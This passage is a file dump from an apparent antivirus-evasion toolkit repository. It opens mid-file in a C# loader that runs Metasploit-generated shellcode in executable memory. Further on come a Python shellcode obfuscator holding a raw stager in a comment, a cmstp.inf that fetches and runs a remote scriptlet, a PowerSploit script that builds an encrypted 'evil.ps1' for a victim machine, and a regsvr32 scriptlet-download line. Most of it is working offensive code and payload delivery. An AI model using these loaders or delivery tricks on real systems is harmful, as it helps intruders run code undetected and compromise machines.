57 | {
58 | public static void Exec()
59 | {
60 | // native function's compiled code
61 | // generated with metasploit
62 | byte[] shellcode = new byte[503] {
63 | 0xba,0x6e,0xad,0xe9,0x4f,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,
64 | 0x78,0x83,0xee,0xfc,0x31,0x56,0x0e,0x03,0x38,0xa3,0x0b,0xba,0x1e,0x71,0x75,
65 | 0xbe,0x85,0x74,0xe0,0x98,0xcd,0x5c,0x01,0x42,0x1e,0x54,0x58,0x02,0x51,0x16,
66 | 0x83,0x66,0x51,0xd2,0xb0,0x18,0xbe,0x22,0xb1,0x0a,0x52,0x01,0xc2,0xca,0xa5,
67 | 0x44,0x61,0x18,0x6a,0x8d,0x90,0xf1,0x8e,0xe2,0x41,0x33,0xf8,0x82,0xdb,0xcf,
68 | 0x36,0x26,0xfc,0xc3,0xf3,0x4c,0xa5,0x7f,0x86,0xb1,0x77,0xff,0xdc,0x9b,0x25,
69 | 0xbf,0xa3,0x50,0xd1,0xf1,0x44,0x9b,0x8f,0xf1,0x7d,0xe8,0xee,0x19,0x69,0xa9,
70 | 0x1a,0x9b,0x5c,0x23,0xa8,0x95,0x76,0x01,0x7b,0xa0,0x42,0x72,0x34,0x11,0x17,
71 | 0xf5,0x8f,0x69,0x2b,0xc2,0xcd,0x90,0x81,0x20,0x10,0x90,0x8a,0xa7,0xc0,0x37,
72 | 0x59,0x51,0x8e,0x30,0x2a,0x29,0xf0,0x33,0x54,0xbe,0x01,0xf0,0xa2,0x53,0x2e,
73 | 0xd0,0xb6,0xb3,0x43,0xa3,0x91,0x74,0xc4,0xa7,0x79,0x60,0x6c,0xab,0xc3,0xc0,
74 | 0x5a,0x80,0x55,0xcd,0xc3,0x85,0xe7,0xd4,0x1d,0xc7,0x42,0xfa,0x1e,0x7b,0x57,
75 | 0xc5,0x8b,0xa7,0x03,0x27,0x23,0x04,0x40,0x5a,0xdf,0x62,0x6d,0x0e,0x8a,0xc9,
76 | 0xee,0x64,0x07,0x89,0x13,0xa9,0x54,0x07,0xc2,0xa4,0x34,0x25,0x56,0x52,0x1e,
77 | 0x1e,0x71,0xc8,0x45,0xd5,0x0a,0xfe,0xb9,0xba,0xef,0x23,0x5f,0x39,0x8e,0x48,
78 | 0xac,0x93,0x89,0x3d,0xc9,0x77,0x5b,0x9a,0x80,0x53,0x13,0xf8,0xbf,0x11,0x28,
79 | 0x58,0x74,0x59,0x60,0x85,0x3c,0x96,0x9f,0x35,0xc2,0x27,0x33,0xe8,0xbf,0x1c,
80 | 0x41,0xa7,0xca,0x33,0x78,0xda,0x7e,0x73,0x21,0x05,0xae,0x3a,0xc9,0xad,0xb5,
81 | 0x7c,0x43,0x99,0x2f,0x58,0x16,0xe3,0x51,0xa9,0x72,0x3a,0x04,0x01,0x32,0x26,
82 | 0xfb,0x54,0x0e,0x0e,0xad,0x23,0xa0,0x6e,0x40,0xc2,0xf7,0x87,0xb9,0x54,0x72,
83 | 0x5b,0xb9,0x1e,0x75,0x9c,0x5c,0x2b,0x0a,0x2c,0x59,0x05,0x5e,0x7a,0x5f,0x7b,
84 | 0x5b,0x14,0xa1,0x56,0x2e,0xd3,0x37,0xb5,0x11,0xfc,0x65,0x8a,0xff,0x6a,0x02,
85 | 0x92,0xbf,0xd3,0x58,0x44,0x5d,0x8f,0x84,0x4e,0x42,0xbb,0xe8,0xce,0x6a,0xb2,
86 | 0x0b,0x81,0xfd,0x77,0x50,0x59,0x1e,0x65,0x41,0x4f,0x80,0xf7,0x54,0x3c,0x94,
87 | 0xdf,0xa3,0x6c,0xe6,0x8a,0x92,0xf8,0x50,0x15,0x77,0xdd,0xa8,0xa7,0x41,0x46,
88 | 0xd7,0xe5,0x54,0x2f,0xe0,0x7e,0x09,0x83,0x68,0x90,0x6a,0x4e,0x64,0x9c,0x66,
89 | 0xa1,0x5f,0xa7,0x8d,0xc3,0x3f,0x56,0x2c,0xe6,0x88,0xc0,0xb1,0xc1,0xee,0xc4,
90 | 0x7b,0x3c,0x93,0x8d,0x8d,0xe0,0xad,0x92,0x91,0x84,0x58,0x28,0x64,0x34,0xc8,
91 | 0xdc,0x5e,0x78,0xb8,0x69,0xb2,0x04,0x5a,0x32,0x88,0x9e,0x9d,0x98,0xd6,0xfa,
92 | 0x19,0x89,0x7f,0x70,0x72,0x22,0x54,0x25,0x3f,0xcb,0x31,0x90,0x67,0xe7,0x68,
93 | 0xb0,0xb6,0x72,0xe9,0xd4,0xfa,0xcb,0x0a,0xdc,0x4a,0xab,0xf8,0xbc,0xe3,0x1d,
94 | 0x11,0x7a,0xbc,0x3e,0x68,0x32,0x1c,0x3b,0xb7,0x33,0x57,0x2f,0x41,0x98,0x5e,
95 | 0xa8,0x0f,0x6c,0xc2,0xb7,0x52,0xe5,0x8e,0x45,0xae,0x43,0xfc,0xae,0xfe,0x87,
96 | 0x4f,0xe0,0xc2,0x52,0xff,0x8e,0x19,0x9e };
97 |
98 |
99 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
100 | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
101 | Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
102 | IntPtr hThread = IntPtr.Zero;
103 | UInt32 threadId = 0;
104 | // prepare data
105 |
106 |
107 | IntPtr pinfo = IntPtr.Zero;
108 |
109 | // execute native code
110 |
111 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
112 | WaitForSingleObject(hThread, 0xFFFFFFFF);
113 |
114 | }
115 |
116 | private static UInt32 MEM_COMMIT = 0x1000;
117 |
118 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
119 |
120 | [DllImport("kernel32")]
121 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
122 | UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
123 |
124 | [DllImport("kernel32")]
125 | private static extern bool VirtualFree(IntPtr lpAddress,
126 | UInt32 dwSize, UInt32 dwFreeType);
127 |
128 | [DllImport("kernel32")]
129 | private static extern IntPtr CreateThread(
130 |
131 | UInt32 lpThreadAttributes,
132 | UInt32 dwStackSize,
133 | UInt32 lpStartAddress,
134 | IntPtr param,
135 | UInt32 dwCreationFlags,
136 | ref UInt32 lpThreadId
137 |
138 | );
139 | [DllImport("kernel32")]
140 | private static extern bool CloseHandle(IntPtr handle);
141 |
142 | [DllImport("kernel32")]
143 | private static extern UInt32 WaitForSingleObject(
144 |
145 | IntPtr hHandle,
146 | UInt32 dwMilliseconds
147 | );
148 | [DllImport("kernel32")]
149 | private static extern IntPtr GetModuleHandle(
150 |
151 | string moduleName
152 |
153 | );
154 | [DllImport("kernel32")]
155 | private static extern UInt32 GetProcAddress(
156 |
157 | IntPtr hModule,
158 | string procName
159 |
160 | );
161 | [DllImport("kernel32")]
162 | private static extern UInt32 LoadLibrary(
163 |
164 | string lpFileName
165 |
166 | );
167 | [DllImport("kernel32")]
168 | private static extern UInt32 GetLastError();
169 |
170 |
171 | }
--------------------------------------------------------------------------------
/tools/Invoke-Obfuscation.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Invoke-Obfuscation.zip
--------------------------------------------------------------------------------
/tools/ProcessInjection.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/ProcessInjection.zip
--------------------------------------------------------------------------------
/tools/ReflectiveDLLInjection.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/ReflectiveDLLInjection.zip
--------------------------------------------------------------------------------
/tools/SharpCradle.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/SharpCradle.zip
--------------------------------------------------------------------------------
/tools/ShellcodeWrapper.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/ShellcodeWrapper.zip
--------------------------------------------------------------------------------
/tools/SimpleShellcodeInjector.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/SimpleShellcodeInjector.zip
--------------------------------------------------------------------------------
/tools/Veil-Catapult.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Veil-Catapult.tar.gz
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/Autoruns_v13.7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/Autoruns_v13.7.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/IceSword122cn.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/IceSword122cn.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/PCHunter_free_1.51.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/PCHunter_free_1.51.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/PowerToolx32_v4.8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/PowerToolx32_v4.8.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/PowerToolx64_v2.0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/PowerToolx64_v2.0.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/ProcessExplorer_v16.20.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/ProcessExplorer_v16.20.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/ProcessMonitor_v3.32.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/ProcessMonitor_v3.32.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/Win64AST_1.10Beta7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/Win64AST_1.10Beta7.zip
--------------------------------------------------------------------------------
/tools/Win恶意软件行为分析工具/火绒剑独立版 0.1.0.36.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/火绒剑独立版 0.1.0.36.zip
--------------------------------------------------------------------------------
/tools/avet.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/avet.tar.gz
--------------------------------------------------------------------------------
/tools/bat2exe.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/bat2exe.zip
--------------------------------------------------------------------------------
/tools/bin2hex.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/bin2hex.exe
--------------------------------------------------------------------------------
/tools/cmstp.inf:
--------------------------------------------------------------------------------
1 | ;cmstp.exe /s cmstp.inf
2 |
3 | [version]
4 | Signature=$chicago$
5 | AdvancedINF=2.5
6 |
7 | [DefaultInstall_SingleUser]
8 | UnRegisterOCXs=UnRegisterOCXSection
9 |
10 | [UnRegisterOCXSection]
11 | %11%\scrobj.dll,NI,https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/powersct.sct
12 |
13 | [Strings]
14 | AppAct = "SOFTWARE\Microsoft\Connection Manager"
15 | ServiceName="Yay"
16 | ShortSvcName="Yay"
--------------------------------------------------------------------------------
/tools/donut_v0.9.2_release.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/donut_v0.9.2_release.zip
--------------------------------------------------------------------------------
/tools/encode_shellcode.py:
--------------------------------------------------------------------------------
1 | from capstone import *
2 | from keystone import *
3 |
4 | def assemble(code):
5 | try:
6 | ks = Ks(KS_ARCH_X86, KS_MODE_32)
7 | encoding, count = ks.asm(code)
8 | return [hex(i) for i in encoding]
9 | except KsError as e:
10 | print(e)
11 | return -1
12 | def byteoffset2index(offset):
13 | temp=offset
14 | a=0
15 | for i in md.disasm(CODE, 0x0):
16 | temp-=len(i.bytes)
17 | a+=1
18 | if temp==0:
19 | return a
20 | if __name__ == "__main__":
21 | md = Cs(CS_ARCH_X86, CS_MODE_32)
22 | controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]
23 | registers=["eax","ebx","edx","ebp","esp","edi","esi"]
24 | #CODE = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
25 | CODE = b"\xb8\xc9\x58\xa0\x0c\xd9\xce\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x98\x83\xeb\xfc\x31\x43\x10\x03\x43\x10\x2b\xad\x7d\xc9\x11\x44\xae\xab\x14\x80\x3a\x68\x22\x6a\xf0\xb9\x7b\x1a\xc7\x69\x61\x1e\x78\x90\x16\xc8\x84\x46\xe7\x67\x22\x06\xdf\x47\xbe\xba\x30\x83\x99\x7a\x9a\x68\x8b\xe4\xc3\x14\xcf\x32\xc7\xcd\xbd\xe7\xbc\xd2\xfe\x87\xb9\xfa\x81\x4b\x98\x37\xca\x5d\xf5\x98\x2f\x3c\x01\x1d\x54\x49\xeb\xc6\x32\xe7\x5d\x9a\x41\xb5\x82\x8a\x4c\x40\x33\x9a\xf6\xcf\xb7\xfd\x6e\xe3\xe2\xa2\xbc\x17\x20\xd4\xa8\xcb\x4e\x31\x93\x29\x22\x2b\xb8\x0c\x3c\x17\x9f\x5f\x8b\x20\x9e\xdc\x2c\xb0\x36\xe1\xeb\xff\xe9\xea\xf4\x29\x7a\xeb\x5b\x24\xb6\x30\x51\xa8\x29\x22\xed\x0f\xb4\x10\x94\x3a\xde\x6f\x4f\x62\xc6\x36\x1c\x83\x61\x34\x67\xb1\xda\xc9\x88\x92\x13\x66\x6c\x92\x54\xc6\x35\x53\xc2\x8d\x12\x77\xef\xfa\x45\x4e\x37\x32\x43\xf3\xae\x85\x57\x14\xe1\x6e\xf9\xb7\x26\xac\xf6\x7c\x01\xa2\x27\x69\x55\xbd\xb6\x1a\x31\x47\x23\x15\xad\xc9\xc9\xc6\xca\x22\x9d\xb5\xf1\x82\xe5\x35\x03\x15\x46\xd7\xde\x19\x1b\x32\x9a\x4a\x57\xb0\xed\xa7\x6c\x77\x0c\xf9\x30\x20\x17\x9f\xe2\xf8\xca\x2c\xa4\x80\x77\x9d\x4c\x67\x1f\xc5\xea\xd9\x01\x9a\x22\xec\xde\x49\xdc\xab\xda\x6c\x33\xfc\x21\x1d\x2a\x61\x66\xa6\x5c\xa6\x3b\xc9\xc4\xa3\xfc\x8d\xa8\xc2\x62\x13\xe5\xbc\x55\xa5\x13\xca\xec\xe5\x60\xe5\x6d\xa9\x4b\xd4\x9d\x7f\x21\x55\xd0\xc0\x3d\x5a\x6b\x5a\x8d\x0f\xe4\xcf\x1f\x90\xab\xf8\x22\x35\xd3\xda\x7b\x58\x3b\x79\x6f\xe8\x0a\xa3\xdf\x70\xfc\x3d\xb3\xa5\x1d\x8e\x4f\x3a\xe7\xe9\x0c\x96\x25\xe0\x1e\x17\x7b\xcc\xfb\xc7\x5c\xdc\x4e\x0d\x8f\x21\xdb\xe2\x56\xc6\xb8\x3e\xa2\xa7\x20\x55\x2e\xbc\x03\x29\x77\xd4\x09\x0a\x54\x42\x26\xcc\x08\xeb\x8a\x84\x8e\x54\xa9\xf3\x48\xd0\xb6\xfc\x03\x39\xe4\xe7\x04\x56\x4e\x9b\x21\x37\x68\x40\x26\xc0\x7d\xd7\x1c\x23\xab\x91\x30\x59\x41\x3a\xae\x7a\xff\x77\x26\x29\xda\x42\xc6\xf6\x05\x0c\x2c\x72\x67\x06\x7b\xfa\x53\x0b\xb0\xa6\x60\xff\xa8\x94\x7e\x2c\x9f\x76\x12\x5c\xa9\x8f\x47\xc6\xa4\x64\x6e\x87\x2a\xab\x1b\xc2\xa2\xde\x29\x1d\x48\xb4\x82\x2a\x5a\x38\x12\x0d\xbf\x82\x1c\xd8\xfc\x9b\x42\x35\xd7\x40\xf4\x4e\x41\x54\xaf\xde\xd2\xf8\x0f\x75\x9a\x6a\x70\x5a\xc4\x29\xe2\xa9\xec\xc8\x55\x07\xc4\x04\x2e\x89\x02\xf2\xff\x19\x8a\xab\x04\x63\x25\x63\x41\xb7\x99\x66\x42\xad\x13\x6e\x9b\xb1\x3f\xe6\x30\x02\xed\x4f\x96\x66\x1c\x37\xbc\x77\xc1\xf6\x8f\xfd\xb1\x2a\x50\x62\xcf\x96\x5f\x14\xd4\xa2\xcf\x09\x07\xeb\x2a\xbb\xce\x2e\x27\x16\x49\x03\x68\x3b\x1b\x7e\x7a\x85\xf7\x1b\xc1\x61\x25\xc8\xe3\xe3\xae\x14\x86\x8e\xf6\xad\x1b\x5a\x97\x5f\x87\x24\xf1\xee\x08\x49\x48\x39\x2e\xad\x55\xe9\x4c\x34\x5d\x3b\x0b\xde\x09\xa6\x54\x2f\x0b\x59"
26 | asm=";".join([i.mnemonic+" "+i.op_str for i in md.disasm(CODE, 0x0)])
27 | asmarray=asm.split(";")
28 | length=len(asmarray)
29 | tags=[]
30 | for i in range(0,len(asmarray)):
31 | for mnemonic in controlflow:
32 | if (mnemonic in asmarray[i]):
33 | tags.append(i)
34 | mask=[]
35 | for i in range(0,len(tags)):
36 | for reg in registers:
37 | if (reg in asmarray[tags[i]]):
38 | mask.append(tags[i])
39 | [tags.remove(i) for i in mask]
40 | tagins=[asmarray[i] for i in tags]
41 | revision=[]
42 | for i in range(0,len(tagins)):
43 | b=tagins[i][tagins[i].index("0x"):]
44 | n=byteoffset2index(int(b,16))
45 | revision.append(n)
46 | revision_unique=list(set(revision))
47 | for i in range(0,len(revision_unique)):
48 | asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]]
49 | tagins=[asmarray[i] for i in tags]
50 | for i in range(0,len(tags)):
51 | asmarray[tags[i]]=tagins[i][:tagins[i].index("0x")]+"a"+str(revision[i])
52 | obfuscation="nop"
53 | code=obfuscation+";"+(";"+obfuscation+";").join(asmarray)
54 | print("unsigned char buf[]="+str(assemble(code)).replace("\'","").replace("[","{").replace("]","}")+";")
55 | #print("unsigned char buf[]="+str(assemble(code)[::-1]).replace("\'","").replace("[","{").replace("]","}")+";")
--------------------------------------------------------------------------------
/tools/go-shellcode.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/go-shellcode.zip
--------------------------------------------------------------------------------
/tools/green-hat-suite.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/green-hat-suite.tar.gz
--------------------------------------------------------------------------------
/tools/gsl-sc-loader.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/gsl-sc-loader.zip
--------------------------------------------------------------------------------
/tools/impacket.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/impacket.tar.gz
--------------------------------------------------------------------------------
/tools/mimikatz/Convert-BinaryToString.ps1:
--------------------------------------------------------------------------------
1 | function Convert-BinaryToString {
2 | [CmdletBinding()] param (
3 | [string] $FilePath
4 | )
5 | try {
6 | $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
7 | }
8 | catch {
9 | throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
10 | }
11 | if ($ByteArray) {
12 | $Base64String = [System.Convert]::ToBase64String($ByteArray);
13 | }
14 | else {
15 | throw '$ByteArray is $null.';
16 | }
17 | Write-Output -InputObject $Base64String
18 | }
--------------------------------------------------------------------------------
/tools/mimikatz/Out-EncryptedScript.ps1:
--------------------------------------------------------------------------------
1 | function Out-EncryptedScript
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Encrypts text files/scripts.
7 |
8 | PowerSploit Function: Out-EncryptedScript
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Out-EncryptedScript will encrypt a script (or any text file for that
17 | matter) and output the results to a minimally obfuscated script -
18 | evil.ps1 by default.
19 |
20 | .PARAMETER ScriptPath
21 |
22 | Path to this script
23 |
24 | .PARAMETER Password
25 |
26 | Password to encrypt/decrypt the script
27 |
28 | .PARAMETER Salt
29 |
30 | Salt value for encryption/decryption. This can be any string value.
31 |
32 | .PARAMETER InitializationVector
33 |
34 | Specifies a 16-character the initialization vector to be used. This
35 | is randomly generated by default.
36 |
37 | .EXAMPLE
38 |
39 | C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty
40 |
41 | Description
42 | -----------
43 | Encrypt the contents of this file with a password and salt. This will
44 | make analysis of the script impossible without the correct password
45 | and salt combination. This command will generate evil.ps1 that can
46 | dropped onto the victim machine. It only consists of a decryption
47 | function 'de' and the base64-encoded ciphertext.
48 |
49 | .EXAMPLE
50 |
51 | C:\PS> [String] $cmd = Get-Content .\evil.ps1
52 | C:\PS> Invoke-Expression $cmd
53 | C:\PS> $decrypted = de password salt
54 | C:\PS> Invoke-Expression $decrypted
55 |
56 | Description
57 | -----------
58 | This series of instructions assumes you've already encrypted a script
59 | and named it evil.ps1. The contents are then decrypted and the
60 | unencrypted script is called via Invoke-Expression
61 |
62 | .NOTES
63 |
64 | This command can be used to encrypt any text-based file/script
65 | #>
66 |
67 | [CmdletBinding()] Param (
68 | [Parameter(Position = 0, Mandatory = $True)]
69 | [String]
70 | $ScriptPath,
71 |
72 | [Parameter(Position = 1, Mandatory = $True)]
73 | [String]
74 | $Password,
75 |
76 | [Parameter(Position = 2, Mandatory = $True)]
77 | [String]
78 | $Salt,
79 |
80 | [Parameter(Position = 3)]
81 | [ValidateLength(16, 16)]
82 | [String]
83 | $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),
84 |
85 | [Parameter(Position = 4)]
86 | [String]
87 | $FilePath = '.\evil.ps1'
88 | )
89 |
90 | $AsciiEncoder = New-Object System.Text.ASCIIEncoding
91 | $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)
92 | # While this can be used to encrypt any file, it's primarily designed to encrypt itself.
93 | [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath
94 | $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)
95 | $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
96 | $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC
97 | [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16)
98 | $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)
99 | $MemStream = New-Object System.IO.MemoryStream
100 | $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
101 | $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
102 | $CryptoStream.FlushFinalBlock()
103 | $CipherTextBytes = $MemStream.ToArray()
104 | $MemStream.Close()
105 | $CryptoStream.Close()
106 | $Key.Clear()
107 | $Cipher = [Convert]::ToBase64String($CipherTextBytes)
108 |
109 | # Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function
110 | $Output = @"
111 | function de([String] `$b, [String] `$c)
112 | {
113 | `$a = "$Cipher";
114 | `$encoding = New-Object System.Text.ASCIIEncoding;
115 | `$dd = `$encoding.GetBytes("$InitializationVector");
116 | `$aa = [Convert]::FromBase64String(`$a);
117 | `$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes(`$b, `$encoding.GetBytes(`$c), "SHA1", 2);
118 | [Byte[]] `$e = `$derivedPass.GetBytes(16);
119 | `$f = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
120 | `$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
121 | [Byte[]] `$h = New-Object Byte[](`$aa.Length);
122 | `$g = `$f.CreateDecryptor(`$e, `$dd);
123 | `$i = New-Object System.IO.MemoryStream(`$aa, `$True);
124 | `$j = New-Object System.Security.Cryptography.CryptoStream(`$i, `$g, [System.Security.Cryptography.CryptoStreamMode]::Read);
125 | `$r = `$j.Read(`$h, 0, `$h.Length);
126 | `$i.Close();
127 | `$j.Close();
128 | `$f.Clear();
129 | if ((`$h.Length -gt 3) -and (`$h[0] -eq 0xEF) -and (`$h[1] -eq 0xBB) -and (`$h[2] -eq 0xBF)) { `$h = `$h[3..(`$h.Length-1)]; }
130 | return `$encoding.GetString(`$h).TrimEnd([Char] 0);
131 | }
132 | "@
133 |
134 | # Output decrypt function and ciphertext to evil.ps1
135 | Out-File -InputObject $Output -Encoding ASCII $FilePath
136 |
137 | Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
138 | }
139 |
--------------------------------------------------------------------------------
/tools/mimikatz/ResHacker.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/ResHacker.zip
--------------------------------------------------------------------------------
/tools/mimikatz/mimikatz.msi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/mimikatz.msi
--------------------------------------------------------------------------------
/tools/mimikatz/mimikatz.sct:
--------------------------------------------------------------------------------
1 | <?XML version="1.0"?>
2 | <scriptlet>
3 |
4 | <registration
5 | description="Bandit"
6 | progid="Bandit"
7 | version="1.00"
8 | classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
9 | >
10 |
11 | <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
12 | <!-- DFIR -->
13 | <!-- .sct files are downloaded and executed from a path like this -->
14 | <!-- Though, the name and extension are arbitary.. -->
15 | <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
